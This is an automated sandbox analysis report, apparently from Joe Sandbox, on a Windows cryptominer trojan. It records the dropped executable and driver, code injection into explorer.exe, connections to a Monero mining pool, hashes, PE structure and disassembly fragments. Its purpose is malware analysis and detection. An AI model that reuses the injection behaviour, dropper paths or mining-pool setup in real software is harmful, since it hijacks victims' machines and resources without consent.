Source: C:\Users\user\Desktop\LfHJdrALlh.exe	Code function: 0_2_00007FF612D31160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	0_2_00007FF612D31160
Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Code function: 9_2_00007FF621A91160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	9_2_00007FF621A91160
Source: C:\Windows\System32\conhost.exe	Code function: 11_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,	11_2_0000000140001160

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 51.15.58.224 10343

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Memory written: PID: 3136 base: 140000000 value: 4D	Jump to behavior
Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Memory written: PID: 3136 base: 140001000 value: NU	Jump to behavior
Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Memory written: PID: 3136 base: 140665000 value: DF	Jump to behavior
Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Memory written: PID: 3136 base: 140834000 value: 00	Jump to behavior
Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Memory written: PID: 3136 base: 37F010 value: 00	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Thread register set: target process: 2792			Jump to behavior
Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Thread register set: target process: 3136			Jump to behavior

Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe			Jump to behavior
Source: C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	Process created: C:\Windows\explorer.exe explorer.exe			Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: explorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: procexp.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	11 Windows Service	11 Windows Service	1 Masquerading	OS Credential Dumping	321 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Service Execution	1 DLL Side-Loading	311 Process Injection	12 Virtualization/Sandbox Evasion	LSASS Memory	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	311 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	3 System Information Discovery	Distributed Component Object Model	Input Capture	1 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
LfHJdrALlh.exe	66%	ReversingLabs	Win64.Trojan.MintZard

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe	66%	ReversingLabs	Win64.Trojan.MintZard
C:\Windows\Temp\xvkjzlkkmfrj.sys	5%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://crl.cloudflare.com/origin_ca.crlQr	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
xmr-eu1.nanopool.org	51.15.58.224	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ocsp.cloudflare.com/origin_caY	explorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.cloudflare.com/origin_ca.crl0	explorer.exe, 0000000C.00000002.4486146482.000000000062C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.cloudflare.com/origin_ca	explorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.cloudflare.com/origin_ca.crlQr	explorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.cloudflare.com/origin_ca0	explorer.exe, 0000000C.00000002.4486146482.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.4486146482.000000000062C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.cloudflare.com/origin_ca.crl	explorer.exe, 0000000C.00000002.4486146482.0000000000639000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
51.15.58.224	xmr-eu1.nanopool.org	France		12876	OnlineSASFR	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1570391
Start date and time:	2024-12-06 22:41:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LfHJdrALlh.exe renamed because original name is a hash value
Original Sample Name:	0e540d9532a8ea783d15290e948d2e0b744c5c61dc7d1953fcfef1aeda4be999.exe
Detection:	MAL
Classification:	mal100.evad.mine.winEXE@18/2@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 5 Number of non-executed functions: 25
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: LfHJdrALlh.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
51.15.58.224	file.exe	Get hash	malicious	Xmrig	Browse
	aA45th2ixY.exe	Get hash	malicious	Xmrig	Browse
	25C1.exe	Get hash	malicious	Glupteba, Xmrig	Browse
	8EbwkHzF0i.exe	Get hash	malicious	Xmrig, zgRAT	Browse
	file.exe	Get hash	malicious	Glupteba, SmokeLoader, Xmrig	Browse
	file.exe	Get hash	malicious	Parallax RAT, Phonk Miner, Xmrig	Browse
	file.exe	Get hash	malicious	Parallax RAT, Phonk Miner, Xmrig	Browse
	file.exe	Get hash	malicious	Phonk Miner, Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
xmr-eu1.nanopool.org	rLaC8kO1rD.exe	Get hash	malicious	Xmrig	Browse	51.15.65.182
	6xQ8CMUaES.exe	Get hash	malicious	Xmrig	Browse	51.89.23.91
	4o8Tgrb384.exe	Get hash	malicious	Xmrig	Browse	51.15.65.182
	rtYpMDeKUq.exe	Get hash	malicious	Xmrig	Browse	51.89.23.91
	NH95Vhokye.exe	Get hash	malicious	Xmrig	Browse	54.37.137.114
	ahlntQUj2t.exe	Get hash	malicious	Xmrig	Browse	54.37.232.103
	file.exe	Get hash	malicious	Xmrig	Browse	163.172.154.142
	HmA7s2gaa5.exe	Get hash	malicious	Xmrig	Browse	162.19.224.121
	12Jh49DCAj.exe	Get hash	malicious	Xmrig	Browse	51.15.65.182
	Ky4J8k89A7.exe	Get hash	malicious	Stealc, Vidar, Xmrig	Browse	51.15.58.224

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OnlineSASFR	l64.elf	Get hash	malicious	Xmrig	Browse	51.158.204.249
	Opportunity Offering Pure Home Improvement Unique Guest Post Websites A... (107Ko).msg	Get hash	malicious	Unknown	Browse	163.172.240.109
	EHak.exe	Get hash	malicious	Unknown	Browse	62.210.124.132
	EHak.exe	Get hash	malicious	Unknown	Browse	62.210.124.132
	teste.i686.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse	51.158.21.23
	teste.arm.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	51.158.232.110
	rLaC8kO1rD.exe	Get hash	malicious	Xmrig	Browse	212.47.253.124
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Xmrig	Browse	163.172.171.111
	file.exe	Get hash	malicious	Xmrig	Browse	163.172.171.111
	https://antiphishing.vadesecure.com/v4?f=U3NocHNZUmllMWk0MmdjMYDgQ0wsRYjjfDkZnUsmsqS3bv-gdJZTKaN5KSsipRTf&i=cnNwakphM05sN25WcmhxVcUfrB8NjiRd7gd4RsoOTL4&k=A3pt&r=UUJQWml1Y2NtejlnWDZLZB0Eg6oPQLWHk5a0M-cKRXyoaPvtU4tInW_VqCgS4DhSa_cUZCcNAUmWLKbw9MOxGw&s=bf71d8ade961f6ab439c8235babb7157b334d689888d3083d0cc1744cfe48aaf&u=https%3A%2F%2Fpublic-fra.mkt.dynamics.com%2Fapi%2Forgs%2F85a8c477-bea7-ef11-8a66-0022483994f9%2Fr%2FMKSqoVs73k-RUO5uHPfRswIAAAA%3Ftarget%3D%257B%2522TargetUrl%2522%253A%2522https%25253A%25252F%25252Fassets-fra.mkt.dynamics.com%25252F85a8c477-bea7-ef11-8a66-0022483994f9%25252Fdigitalassets%25252Fstandaloneforms%25252F46042089-b8ac-ef11-a72d-6045bd6e29e8%2522%252C%2522RedirectOptions%2522%253A%257B%25226%2522%253A%2522mktprf9fb729cc84d74db3bce9a30da7409e87eoprf%2522%252C%25221%2522%253Anull%257D%257D%26digest%3Djuexwq7Jl6DCR7CneIIynCjAtNPRJ1FxLmm99rnbDLA%253D%26secretVersion%3D02e7c83d621d4269af2f08a8e4e233cf	Get hash	malicious	Unknown	Browse	163.172.240.109

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Temp\xvkjzlkkmfrj.sys	iKvzvknzW1.exe	Get hash	malicious	Xmrig	Browse
	2zirzlMVqX.bat	Get hash	malicious	Xmrig	Browse
	DM6vAAgoCw.exe	Get hash	malicious	Orcus, Xmrig	Browse
	f5TWdT5EAc.exe	Get hash	malicious	Phorpiex, RHADAMANTHYS, Xmrig	Browse
	luQ2wBh8q6.exe	Get hash	malicious	Xmrig	Browse
	lokigod.exe	Get hash	malicious	Xmrig	Browse
	nfkciRoR4j.exe	Get hash	malicious	Xmrig	Browse
	File.exe	Get hash	malicious	Orcus, Xmrig	Browse
	rLaC8kO1rD.exe	Get hash	malicious	Xmrig	Browse
	newtpp.exe	Get hash	malicious	Xmrig	Browse

Created / dropped Files

C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe

Download File

Process:	C:\Users\user\Desktop\LfHJdrALlh.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2623488
Entropy (8bit):	6.5318384666570575
Encrypted:	false
SSDEEP:	49152:Z8KPU0y2Nb3AqgMlXcSvX5uYClYynHgSCQQIsL/H/xyNFbF1dFxg++jrhH0JSr:ZvPUn2FAqZlf5uYClYyASCQQIIpyNFpW
MD5:	17E83A7EF86ED642E8182C051CD382FA
SHA1:	D5D3E3D6A8B9566B58275CE9C200E9B74F2310EC
SHA-256:	0E540D9532A8EA783D15290E948D2E0B744C5C61DC7D1953FCFEF1AEDA4BE999
SHA-512:	BBD50377AF9486BA84DA4DA23534C92D13EB3CBBD9B63DD075A01099C0FAF819C0A8D8AEF738B9A072DDB49DF57CF71E541A44E887ADFC22F13451C6D43B1F44
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 66%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....mSg.........."......f....'.....@..........@..............................(...........`.................................................@...<....`(......0(..............p(.x...............................(.......8..............X............................text....d.......f.................. ..`.rdata...............j..............@..@.data... .'......x'.................@....pdata.......0(.......'.............@..@.00cfg.......@(.......'.............@..@.tls.........P(.......(.............@....rsrc........`(.......(.............@..@.reloc..x....p(.......(.............@..B........................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\xvkjzlkkmfrj.sys

Download File

Process:	C:\ProgramData\uqovllzwyhcs\ograohtgkfie.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: iKvzvknzW1.exe, Detection: malicious, Browse Filename: 2zirzlMVqX.bat, Detection: malicious, Browse Filename: DM6vAAgoCw.exe, Detection: malicious, Browse Filename: f5TWdT5EAc.exe, Detection: malicious, Browse Filename: luQ2wBh8q6.exe, Detection: malicious, Browse Filename: lokigod.exe, Detection: malicious, Browse Filename: nfkciRoR4j.exe, Detection: malicious, Browse Filename: File.exe, Detection: malicious, Browse Filename: rLaC8kO1rD.exe, Detection: malicious, Browse Filename: newtpp.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.5318384666570575
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LfHJdrALlh.exe
File size:	2'623'488 bytes
MD5:	17e83a7ef86ed642e8182c051cd382fa
SHA1:	d5d3e3d6a8b9566b58275ce9c200e9b74f2310ec
SHA256:	0e540d9532a8ea783d15290e948d2e0b744c5c61dc7d1953fcfef1aeda4be999
SHA512:	bbd50377af9486ba84da4da23534c92d13eb3cbbd9b63dd075a01099c0faf819c0a8d8aef738b9a072ddb49df57cf71e541a44e887adfc22f13451c6d43b1f44
SSDEEP:	49152:Z8KPU0y2Nb3AqgMlXcSvX5uYClYynHgSCQQIsL/H/xyNFbF1dFxg++jrhH0JSr:ZvPUn2FAqZlf5uYClYyASCQQIIpyNFpW
TLSH:	46C5332D7DAA719CC75993719D712EBA226E52784BE07BCBAFE0153030E1ADA703C51C
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....mSg.........."......f....'.....@..........@..............................(...........`........................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x140001140
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x67536D18 [Fri Dec 6 21:31:04 2024 UTC]
TLS Callbacks:	0x40001760, 0x1, 0x400017e0, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	de41d4e0545d977de6ca665131bb479a

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [00006ED5h]
mov dword ptr [eax], 00000001h
call 00007F1998ED914Fh
nop
nop
nop
dec eax
add esp, 28h
ret
nop
inc ecx
push edi
inc ecx
push esi
push esi
push edi
push ebx
dec eax
sub esp, 20h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov edi, dword ptr [eax+08h]
dec eax
mov esi, dword ptr [00006EC9h]
xor eax, eax
dec eax
cmpxchg dword ptr [esi], edi
sete bl
je 00007F1998ED9170h
dec eax
cmp edi, eax
je 00007F1998ED916Bh
dec esp
mov esi, dword ptr [00008371h]
nop word ptr [eax+eax+00000000h]
mov ecx, 000003E8h
inc ecx
call esi
xor eax, eax
dec eax
cmpxchg dword ptr [esi], edi
sete bl
je 00007F1998ED9147h
dec eax
cmp edi, eax
jne 00007F1998ED9129h
dec eax
mov edi, dword ptr [00006E90h]
mov eax, dword ptr [edi]
cmp eax, 01h
jne 00007F1998ED914Eh
mov ecx, 0000001Fh
call 00007F1998EDF284h
jmp 00007F1998ED9169h
cmp dword ptr [edi], 00000000h
je 00007F1998ED914Bh
mov byte ptr [00280519h], 00000001h
jmp 00007F1998ED915Bh
mov dword ptr [edi], 00000001h
dec eax
mov ecx, dword ptr [00006E7Ah]
dec eax
mov edx, dword ptr [00006E7Bh]
call 00007F1998EDF27Bh
mov eax, dword ptr [edi]
cmp eax, 01h
jne 00007F1998ED915Bh
dec eax
mov ecx, dword ptr [00006E50h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9240	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x286000	0x308	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x283000	0x180	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x287000	0x78	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x80a0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x8410	0x138	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x93d8	0x158	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6496	0x6600	c5668ca78b285355c264a0aca6e42994	False	0.5279947916666666	data	6.19072184207683	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1988	0x1a00	464b9ca302022e1e99eba48b143734a0	False	0.4495192307692308	data	4.677794278098306	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x278320	0x277800	5df1dacb2deaaf69a471cba3ad114c75	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x283000	0x180	0x200	74eef9a2c83fa45622c5ffeab6310291	False	0.505859375	data	3.1195390267160135	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.00cfg	0x284000	0x10	0x200	b18c7380298e104adf73576fa46bccc1	False	0.04296875	data	0.15127132530476972	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0x285000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x286000	0x308	0x400	0cdaac1cdceefd04975538f3236866cf	False	0.3076171875	data	2.4479478225661677	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x287000	0x78	0x200	b6f3e954a379cd58bd63cbc7d485b016	False	0.22265625	data	1.430821234982099	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x286060	0x2a8	data	English	United States	0.4117647058823529

Imports

DLL	Import
msvcrt.dll	__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 22:41:58.869431019 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:41:58.989295959 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:41:58.989420891 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:41:58.989725113 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:41:59.109682083 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:42:00.232450008 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:42:00.232584000 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:42:00.232659101 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:42:00.309392929 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:42:00.429274082 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:42:00.701136112 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:42:00.741938114 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:42:00.933928013 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:42:00.976377964 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:42:07.306174994 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:42:07.523274899 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:42:17.312701941 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:42:17.427985907 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:42:27.314820051 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:42:27.413923979 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:42:37.332137108 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:42:37.382694006 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:42:47.310152054 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:42:47.351460934 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:42:57.313225985 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:42:57.367140055 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:43:07.500061989 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:43:07.554650068 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:43:17.364459038 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:43:17.414102077 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:43:27.404104948 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:43:27.445349932 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:43:37.444704056 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:43:37.493377924 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:43:47.357342005 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:43:47.398530006 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:43:57.443902016 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:43:57.492326975 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:44:07.378065109 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:44:07.429863930 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:44:17.379659891 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:44:17.429856062 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:44:27.410175085 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:44:27.461139917 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:44:43.306826115 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:44:43.351844072 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:44:53.287401915 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:44:53.336220026 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:45:10.284342051 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:45:10.336266994 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:45:20.292166948 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:45:20.336289883 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:45:30.341876984 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:45:30.383177996 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:45:40.339112997 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:45:40.383198023 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:45:50.371572971 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:45:50.414478064 CET	49704	10343	192.168.2.5	51.15.58.224
Dec 6, 2024 22:46:00.373975992 CET	10343	49704	51.15.58.224	192.168.2.5
Dec 6, 2024 22:46:00.430140972 CET	49704	10343	192.168.2.5	51.15.58.224

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 6, 2024 22:41:58.724972010 CET	53589	53	192.168.2.5	1.1.1.1
Dec 6, 2024 22:41:58.865449905 CET	53	53589	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 6, 2024 22:41:58.724972010 CET	192.168.2.5	1.1.1.1	0x5627	Standard query (0)	xmr-eu1.nanopool.org	A (IP address)	IN (0x0001)	false

DNS Answers

